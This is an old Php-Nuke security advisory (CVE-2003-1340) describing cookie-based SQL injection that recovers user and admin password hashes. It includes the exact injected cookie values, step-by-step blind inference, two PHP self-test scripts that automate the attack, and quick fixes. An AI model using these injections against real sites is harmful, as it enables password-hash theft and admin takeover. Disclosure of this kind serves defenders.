Php-Nuke:users and admins password hashes vulnerability

2007.10.01
Credit: bugsman
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2003-1340
CWE: CWE-89


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

BUGSMAN: serving security from Italy since..hem..well, about 1 year ------------------------------------------------------------------------ ------------- Object: users & admins password hash retrieving Tested on Php-Nuke 5.6 e 6.5 Vulnerable versions: I've never seen a patch for this so potentially all versions could be vulnerable... ------------------------------------------------------------------------ ------------- Description: An attacker can obtain password hashes for users and admins, using a particular SQL injection with cookies. An incredible amount of sites are vulnerable to these attacks. Note: Since the SQL injection works with cookies, this problem is not prevented by turning GPC_magic_quotes on. ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< USER HASH: To get the password hash of an user, the attacker just needs a valid account... The attacker visits www.victimsite.com/modules.php?name=Your_Account sending a spoofed user cookie crafted in this way: uid should be: ' or (uname='username_to_hack' and pass like 'a%') or uname = 'valid_username uname should be: username_to_hack pass should be: valid_password Next stepis to examine the result page. If the page is the login page (the one with textboxes) it means that the hash of the password to crack is really LIKE 'a%' and the attacker can go on with the next character. If the page is the details page for the username_to_hack, then it's time to try LIKE 'B%'... In max 512 guesses the attacker has the hash of username_to_hack and now it is possible to create a spoofed cookie to be recognized as username_to_hack. ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< ADMIN HASH: To get the password hash of an admin, the attacker only needs to know the name of that admin, and needs that the Web_Links module should be active and with at least one link: NOTE: The attacker doesn't need a valid account, and can exploit the bug even if the Web_Links module is active only for registered members... The attacker visits www.victimsite.com/modules.php?name=Web_Links&l_op=viewlink&cid=2 sending a spoofed admin cookie crafted in this way: aid should be: admin_to_hack' and pwd like 'a% pwd should be: anything you want Now the attacker examine the page: if the links have the Edit links active, it means the password hash is really LIKE 'a%' so go on with next character, otherwise go on with LIKE 'b%' NOTE: This trick works with some modification, with l_op=MostPopular and l_op=NewLinksDate too. With the hash the attacker can spoof a cookie and get into the admin section of the site. IMPORTANT NOTE: it is not really a problem to obtain the name of an admin, since the name of the God admin can be obtained just using this exploit with different injections. So what the attacker REALLY needs is the Web_Links module active and with at least one link!!!AND NOTHING MORE!!! ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< QUICK-AND-DIRTY FIX: Since I contacted Francisco Burzi, but I didn't get any response I post a quick-and-dirty fix right out of my brain :) DISCLAIMER: I TAKE NO RESPONSABILITY FOR ANY KIND OF DAMAGE OR MISWORKING OF THE SITE CAUSED BY MY FIXES. THESE ARE NOT OFFICIAL PHP-NUKE FIXES SO APPLY THEM AT YOUR OWN RISK! ANOTHER NOTE: I FIX MY PHP-NUKE THIS WAY AND IT WORKS, IT SHOULD WORK FOR YOU TOO.... FIXING USER EXPLOIT: in file /mainfile.php, in function is_user, before the line: if ($uid != '' AND $pwd != '') add this line: $uid=addslashes($uid); FIXING ADMIN EXPLOIT: in file /modules/Web_Links/index.php, in functions NewLinksDate, MostPopular and viewlink before the line: $admin=explode(":",$admin); add this line: $admin=addslashes($admin); then change this line: $result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid ='$aid'", dbi); and make it look like this one: $result3=sql_query("select radminlink,radminsuper from ".$prefix."_authors where aid='$aid' and pwd='$admin[1]'", dbi); NOTE: YOU HAVE TO DO THIS FOR ALL THE 3 FUNCTIONS LISTED BEFORE!!! ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< ARE YOU WEAK? Here you can find two php pages that you can use to find out if your site is vulnerable to this attack. Just upload the pages on the webserver running php-nuke in the same directory for your config.php and open them. NOTE:THESE SCRIPT ARE VERY POOR-CODED, AND I DO NOT ASSURE THAT THEIR RESPONSE IS RIGHT! THEY WORKED FOR ME AND I HOPE THEY WORK FOR YOU TOO! SORRY FOR THE POOR CODING BUT THE SCRIPTS WERE MADE IN HALF AN HOUR :) NOTE: BEFORE YOU EXECUTE THE SCRIPT, BE SURE TO PERSONALIZE THE VALUES WHERE INDICATED!!! This one is to check the user vulnerability: ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< <?php //Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! //This one checks for the user password hash retrieving vulnerability //Note: adjust the script execution time in your php.ini if the script //takes too long $server="localhost"; $script="/modules.php?name=Your_Account"; $validaccount="account";// <---Put a valid username here!!! $validpass="password"; // <---Put the password for the above username here!!! $account_to_hack="pippo";//<--- Put another valid username here!!! $md5char[0]="0"; $md5char[1]="1"; $md5char[2]="2"; $md5char[3]="3"; $md5char[4]="4"; $md5char[5]="5"; $md5char[6]="6"; $md5char[7]="7"; $md5char[8]="8"; $md5char[9]="9"; $md5char[10]="a"; $md5char[11]="b"; $md5char[12]="c"; $md5char[13]="d"; $md5char[14]="e"; $md5char[15]="f"; $found=0; $md5reg=""; function sendToHost($host,$method,$path,$cook) { $buf=""; $method = strtoupper($method); $fp = fsockopen($host,80); fputs($fp, "$method $path HTTP/1.1\n"); fputs($fp, "Host: $host\n"); fputs($fp, "Connection: close\n"); fputs($fp, "Pragma: no-cache\n"); fputs($fp, "Cache-control: no-cache\n"); fputs($fp, "Cookie: user=$cook; lang=italian\n"); fputs($fp, "\n\n"); while (!feof($fp)) $buf .= fgets($fp,128); fclose($fp); return $buf; } if (!isset($charindex)) $charindex=0; $found=0; while($charindex<16){ $md5reg="$md5char[$charindex]%"; $uid="' or (uname = '$account_to_hack' and pass like '$md5reg') or uname = '$validaccount"; $validpass=md5("$validpass"); $cookie=base64_encode("$uid:$account_to_hack:$validpass"); $cookie=str_replace("=","%3D",$cookie); $data=sendToHost("$server","get","$script","$cookie"); if (eregi("Password",$data)){ $found += 1; $charindex += 1; } else{ $charindex += 1; Header("Location: ".$PHP_SELF."?charindex=$charindex&charfound=$charfound&curmd5=$curmd5") ; } } echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; echo "This one check for the user password hash retrieving vulnerability...<br>"; if($found==16) echo "You are NOT vulnerable<br>"; else echo "You are vulnerable!<br>Apply a fix ASAP<br>"; echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; ?> ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< And this one is to check the admin vulnerability: ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< <?php //Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!! //This one checks for the admin password hash retrieving vulnerability //Note: adjust the script execution time in your php.ini if the script //takes too long $server="localhost"; $script="/modules.php?name=Web_Links&l_op=viewlink&cid=1";//<---put a cid that shows a page with links in it $account_to_hack="admin";//<--- Put the admin username here!!! $md5char[0]="0"; $md5char[1]="1"; $md5char[2]="2"; $md5char[3]="3"; $md5char[4]="4"; $md5char[5]="5"; $md5char[6]="6"; $md5char[7]="7"; $md5char[8]="8"; $md5char[9]="9"; $md5char[10]="a"; $md5char[11]="b"; $md5char[12]="c"; $md5char[13]="d"; $md5char[14]="e"; $md5char[15]="f"; $found=0; $md5reg=""; function sendToHost($host,$method,$path,$cook) { $buf=""; $method = strtoupper($method); $fp = fsockopen($host,80); fputs($fp, "$method $path HTTP/1.1\n"); fputs($fp, "Host: $host\n"); fputs($fp, "Connection: close\n"); fputs($fp, "Pragma: no-cache\n"); fputs($fp, "Cache-control: no-cache\n"); fputs($fp, "Cookie: admin=$cook; lang=italian\n"); fputs($fp, "\n\n"); while (!feof($fp)) $buf .= fgets($fp,128); fclose($fp); return $buf; } if (!isset($charindex)) $charindex=0; $found=0; while(($charindex<16)&&($found==0)){ $md5reg="$md5char[$charindex]%"; $aid="$account_to_hack' and pwd like '$md5reg"; $validpass=md5("useless_pass"); $cookie=base64_encode("$aid:$validpass"); $cookie=str_replace("=","%3D",$cookie); $data=sendToHost("$server","get","$script","$cookie"); if (eregi("Edit",$data)){ $found += 1; $charindex += 1; } else{ $charindex += 1; // echo "$data"; Header("Location: ".$PHP_SELF."?charindex=$charindex"); } } echo "Test-script for PHP-NUKE Vulnerabilities: Bugsman made it, yeah!!!!<br>"; echo "This one check for the admin password hash retrieving vulnerability...<br>"; if($found==0) echo "You are NOT vulnerable<br>"; else echo "You are vulnerable!<br>Apply a fix ASAP<br>"; echo "BUGSMAN: serving security from Italy since...hem, well, about 1 year :)<br>"; ?> ><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><>< For any suggestion, comments, hiring (I need money too) or any other thing, contact me at: bugsman (at) libero (dot) it [email concealed] See ya!!!!


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top